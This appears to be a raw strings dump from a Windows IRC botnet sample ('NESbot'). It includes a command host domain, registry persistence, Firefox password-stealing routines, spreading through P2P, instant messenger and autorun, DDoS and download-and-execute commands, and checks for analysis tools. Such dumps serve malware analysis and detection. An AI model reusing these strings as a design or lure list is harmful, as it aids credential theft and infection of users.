ping 0.0.0.0>nul

ping 0.0.0.0>nul

if exist "%s" goto Repeat

if exist "%s" goto Repeat

winsvc32.exe

winsvc32.exe

DataBlock.exe

DataBlock.exe

nhg24.zapto.org

nhg24.zapto.org

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

winsvc32.exe_344:

.text

.text

`.rdata

`.rdata

@.data

@.data

VkKeyScanA

VkKeyScanA

keybd_event

keybd_event

EnumWindows

EnumWindows

USER32.dll

USER32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

MSVCRT.dll

MSVCRT.dll

_acmdln

_acmdln

RegCloseKey

RegCloseKey

RegOpenKeyExA

RegOpenKeyExA

RegCreateKeyExA

RegCreateKeyExA

ADVAPI32.dll

ADVAPI32.dll

WS2_32.dll

WS2_32.dll

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

\SonyCam03-2008.zip

\SonyCam03-2008.zip

SonyCam03-2008.zip

SonyCam03-2008.zip

SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com

SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com

\temp\syz.tmp

\temp\syz.tmp

gafgatew.tmp

gafgatew.tmp

_023.jpeg-VVV.myspace.com

_023.jpeg-VVV.myspace.com

edonkey2000\incoming\

edonkey2000\incoming\

Windows 2008 Server KeyGen.exe

Windows 2008 Server KeyGen.exe

DeadSpace KeyGen.exe

DeadSpace KeyGen.exe

Half-Life 2 WORKS-ON-STEAM.exe

Half-Life 2 WORKS-ON-STEAM.exe

Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe

Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe

Password Cracker.exe

Password Cracker.exe

FTP Cracker.exe

FTP Cracker.exe

Hotmail Hacker.exe

Hotmail Hacker.exe

Hotmail Cracker.exe

Hotmail Cracker.exe

Norton Anti-Virus 2008 Enterprise Crack.exe

Norton Anti-Virus 2008 Enterprise Crack.exe

Kaspersky 2009 Full Suite Crack.exe

Kaspersky 2009 Full Suite Crack.exe

Microsoft Visual C 6 KeyGen.exe

Microsoft Visual C 6 KeyGen.exe

Microsoft Visual Basic 6 KeyGen.exe

Microsoft Visual Basic 6 KeyGen.exe

Microsoft Visual Studio 6 KeyGen.exe

Microsoft Visual Studio 6 KeyGen.exe

Microsoft Visual Studio 2008 KeyGen.exe

Microsoft Visual Studio 2008 KeyGen.exe

Microsoft Visual Basic 2008 KeyGen.exe

Microsoft Visual Basic 2008 KeyGen.exe

Microsoft Visual C 2008 KeyGen.exe

Microsoft Visual C 2008 KeyGen.exe

MSN Live Password Cracker.exe

MSN Live Password Cracker.exe

AOL Instant Messenger (AIM) Cracker.exe

AOL Instant Messenger (AIM) Cracker.exe

AOL Triton Cracker.exe

AOL Triton Cracker.exe

ICQ Account Cracker.exe

ICQ Account Cracker.exe

AOL Password Cracker.exe

AOL Password Cracker.exe

Counter-Strike KeyGen.exe

Counter-Strike KeyGen.exe

Counter-Strike Source KeyGen.exe

Counter-Strike Source KeyGen.exe

DivX Pro KeyGen.exe

DivX Pro KeyGen.exe

RuneScape Cracker.exe

RuneScape Cracker.exe

RuneScape Gold Exploit.exe

RuneScape Gold Exploit.exe

Windows XP Keygen

Windows XP Keygen

Windows XP Crack.exe

Windows XP Crack.exe

Windows Vista Keygen

Windows Vista Keygen

Widnows Vista Crack.exe

Widnows Vista Crack.exe

Kaspersky Crck.exe

Kaspersky Crck.exe

Kaspersky Keygen.exe

Kaspersky Keygen.exe

WOW Account Cracker.exe

WOW Account Cracker.exe

Project 7 Private 4.8.exe

Project 7 Private 4.8.exe

Virus Generator.exe

Virus Generator.exe

Virus Maker.exe

Virus Maker.exe

Nod32 Crack.exe

Nod32 Crack.exe

Nod32 Keygen.exe

Nod32 Keygen.exe

Steam Account Stealer.exe

Steam Account Stealer.exe

Myspace Cracker.exe

Myspace Cracker.exe

Myspace Bruteforce.exe

Myspace Bruteforce.exe

Myspace Attack.exe

Myspace Attack.exe

Limewire Pro Downloader.exe

Limewire Pro Downloader.exe

Tcpip Patch.exe

Tcpip Patch.exe

MSN Hacker 2008.exe

MSN Hacker 2008.exe

MSN Hacker 2009.exe

MSN Hacker 2009.exe

AOL Hacker 2008.exe

AOL Hacker 2008.exe

AOL Hacker 2009.exe

AOL Hacker 2009.exe

YIM HAcker 2008.exe

YIM HAcker 2008.exe

YIM HAcker 2009.exe

YIM HAcker 2009.exe

PhotoShop Keygen.exe

PhotoShop Keygen.exe

Adobe Photoshop Keygen.exe

Adobe Photoshop Keygen.exe

Adobe Photoshop Crack.exe

Adobe Photoshop Crack.exe

Photoshop Crack.exe

Photoshop Crack.exe

Adobe Keygen.exe

Adobe Keygen.exe

Adobe Photoshop CS3 Keygen.exe

Adobe Photoshop CS3 Keygen.exe

Adobe Photoshop CS4 KeyGen.exe

Adobe Photoshop CS4 KeyGen.exe

RuneScape 2008 - Newest Exploits.exe

RuneScape 2008 - Newest Exploits.exe

SOFTWARE\Microsoft\Windows\CurrentVersion

SOFTWARE\Microsoft\Windows\CurrentVersion

%s\%s

%s\%s

keygen

keygen

KeyGen.exe

KeyGen.exe

shlwapi.dll

shlwapi.dll

[.ShellClassInfo]

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

\Desktop.ini

\Desktop.ini

\autorun.inf

\autorun.inf

icon=%SystemRoot%\system32\SHELL32.dll,4

icon=%SystemRoot%\system32\SHELL32.dll,4

ahoo] - Msg & File Sent To: %s Contacts.

ahoo] - Msg & File Sent To: %s Contacts.

%s%d%d%d.JPG.scr

%s%d%d%d.JPG.scr

%s%d%d%d

%s%d%d%d

KeyGen

KeyGen

mozcrt19.dll

mozcrt19.dll

nspr4.dll

nspr4.dll

plds4.dll

plds4.dll

plc4.dll

plc4.dll

nssutil3.dll

nssutil3.dll

sqlite3.dll

sqlite3.dll

softokn3.dll

softokn3.dll

nss3.dll

nss3.dll

PK11_GetInternalKeySlot

PK11_GetInternalKeySlot

PK11_CheckUserPassword

PK11_CheckUserPassword

[Pstore-FF] %s %s:%s

[Pstore-FF] %s %s:%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Application Data\Mozilla\Firefox

Application Data\Mozilla\Firefox

\profiles.ini

\profiles.ini

SOFTWARE\Mozilla\Mozilla Firefox

SOFTWARE\Mozilla\Mozilla Firefox

signons1.txt

signons1.txt

signons2.txt

signons2.txt

signons3.txt

signons3.txt

pstorec.dll

pstorec.dll

%s %s %s:%s

%s %s %s:%s

http:/

http:/

https:/

https:/

kWindows Security Alert

kWindows Security Alert

SbieDll.dll

SbieDll.dll

TCPView - Sysinternals: VVV.sysinternals.com

TCPView - Sysinternals: VVV.sysinternals.com

Process Monitor - Sysinternals: VVV.sysinternals.com

Process Monitor - Sysinternals: VVV.sysinternals.com

Process Explorer - Sysinternals: VVV.sysinternals.com

Process Explorer - Sysinternals: VVV.sysinternals.com

File Monitor - Sysinternals: VVV.sysinternals.com

File Monitor - Sysinternals: VVV.sysinternals.com

SwitchSniffer v1.3.2.0 Registered

SwitchSniffer v1.3.2.0 Registered

SwitchSniffer v1.3.2.0 UnRegistered

SwitchSniffer v1.3.2.0 UnRegistered

Auto Start and Process Viewer : VVV.konradp.com

Auto Start and Process Viewer : VVV.konradp.com

Remote Process Viewer for Windows Networks

Remote Process Viewer for Windows Networks

Process Heap Viewer - VVV.SecurityXploded.com

Process Heap Viewer - VVV.SecurityXploded.com

KERNEL32.DLL

KERNEL32.DLL

TASKMGR.EXE

TASKMGR.EXE

%s gained access..

%s gained access..

%s did not break in..

%s did not break in..

: %s!%s@%s (PM: "%s")

: %s!%s@%s (PM: "%s")

%s fail by: %s!%s@%s (tried: %s)

%s fail by: %s!%s@%s (tried: %s)

%s %s out.

%s %s out.

%s out.

%s out.

%s error: no user at:

%s error: no user at:

%s invalid slot:

%s invalid slot:

%s kill: threads

%s kill: threads

%s no threads

%s no threads

%s killed thread:

%s killed thread:

%s failed kt:

%s failed kt:

%s %s already running: .

%s %s already running: .

%s faild 2 start %s, err: .

%s faild 2 start %s, err: .

%s status: %s.

%s status: %s.

uptime: %s,

uptime: %s,

for: %s.

for: %s.

%s Bot installed on: %s.

%s Bot installed on: %s.

sn] Msg & File Sent To %d Contacts.

sn] Msg & File Sent To %d Contacts.

by: %s!%s@%s

by: %s!%s@%s

%s Advapi.dll Failed

%s Advapi.dll Failed

%s PStore.dll Failed.

%s PStore.dll Failed.

%s Main thread.

%s Main thread.

%s RuC.

%s RuC.

%s mis paramter[s].

%s mis paramter[s].

%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)

%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)

%s spreading disabled.

%s spreading disabled.

%s Thread Disabled.

%s Thread Disabled.

FIREFOX Threads

FIREFOX Threads

%s ddosing %s:%s/%s secs.

%s ddosing %s:%s/%s secs.

%s unable to start ddos, error: %s

%s unable to start ddos, error: %s

%s %s

%s %s

%s seeding!

%s seeding!

%s unable to download file

%s unable to download file

%s wget: %s location: %s.

%s wget: %s location: %s.

%seraseme_%d%d%d%d%d.exe

%seraseme_%d%d%d%d%d.exe

%s Downloading update from: %s to: %s.

%s Downloading update from: %s to: %s.

%s updating from %s

%s updating from %s

%s Couldn't open file for writing: %s.

%s Couldn't open file for writing: %s.

%s File download: %.1fKB to: %s @ %.1fKB/sec.

%s File download: %.1fKB to: %s @ %.1fKB/sec.

%s Couldn't parse path, error:

%s Couldn't parse path, error:

%s Failed to create process: "%s", error:

%s Failed to create process: "%s", error:

%s Created process: "%s", PID:

%s Created process: "%s", PID:

%s Process Finished: "%s", Total Running Time: %s.

%s Process Finished: "%s", Total Running Time: %s.

%s Update failed: Error executing file: %s.

%s Update failed: Error executing file: %s.

%s Bad URL or DNS Error, error:

%s Bad URL or DNS Error, error:

Ping Timeout? (%d-%d)%d/%d

Ping Timeout? (%d-%d)%d/%d

PASS %s

PASS %s

NICK %s

NICK %s

USER NESv5 * 0 :%s

USER NESv5 * 0 :%s

QUIT %s

QUIT %s

JOIN

JOIN

PRIVMSG

PRIVMSG

NICK

NICK

PONG %s

PONG %s

NOTICE %s :%s

NOTICE %s :%s

PRIVMSG %s :%s

PRIVMSG %s :%s

JOIN %s

JOIN %s

JOIN %s %s

JOIN %s %s

PART %s

PART %s

MODE %s %s

MODE %s %s

MODE %s %s %s

MODE %s %s %s

Torrent 1.8.1

Torrent 1.8.1

%d.%d.%d.%d

%d.%d.%d.%d

kernel32.dll

kernel32.dll

user32.dll

user32.dll

advapi32.dll

advapi32.dll

RegEnumKeyExA

RegEnumKeyExA

ws2_32.dll

ws2_32.dll

wininet.dll

wininet.dll

HttpOpenRequestA

HttpOpenRequestA

HttpSendRequestA

HttpSendRequestA

FtpGetFileA

FtpGetFileA

FtpPutFileA

FtpPutFileA

InternetOpenUrlA

InternetOpenUrlA

InternetCrackUrlA

InternetCrackUrlA

Mozilla/4.0 (compatible)

Mozilla/4.0 (compatible)

netapi32.dll

netapi32.dll

dnsapi.dll

dnsapi.dll

iphlpapi.dll

iphlpapi.dll

GetTcpTable

GetTcpTable

GetUdpTable

GetUdpTable

mpr.dll

mpr.dll

shell32.dll

shell32.dll

ShellExecuteA

ShellExecuteA

odbc32.dll

odbc32.dll

SQLDriverConnect

SQLDriverConnect

SQLSetEnvAttr

SQLSetEnvAttr

SQLExecDirect

SQLExecDirect

SQLAllocHandle

SQLAllocHandle

SQLFreeHandle

SQLFreeHandle

SQLDisconnect

SQLDisconnect

userenv.dll

userenv.dll

psapi.dll

psapi.dll

hXXp://checkip.dyndns.org

hXXp://checkip.dyndns.org

hXXp://VVV.whatismyip.com

hXXp://VVV.whatismyip.com

%s%%s

%s%%s

%s!%s@%s

%s!%s@%s

%s fail nigga. (%s!%s@%s) password: %s.

%s fail nigga. (%s!%s@%s) password: %s.

%s too many users logged in.

%s too many users logged in.

%s logged in.

%s logged in.

NESbot %s thread stopped. (%d thread(s) stopped.)

NESbot %s thread stopped. (%d thread(s) stopped.)

NESbot No %s thread found.

NESbot No %s thread found.

%s\removeMe%i%i%i%i.bat

%s\removeMe%i%i%i%i.bat

del "%s">nul

del "%s">nul

ping 0.0.0.0>nul

ping 0.0.0.0>nul

if exist "%s" goto Repeat

if exist "%s" goto Repeat

winsvc32.exe

winsvc32.exe

DataBlock.exe

DataBlock.exe

nhg24.zapto.org

nhg24.zapto.org

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

192.168.11.128

192.168.11.128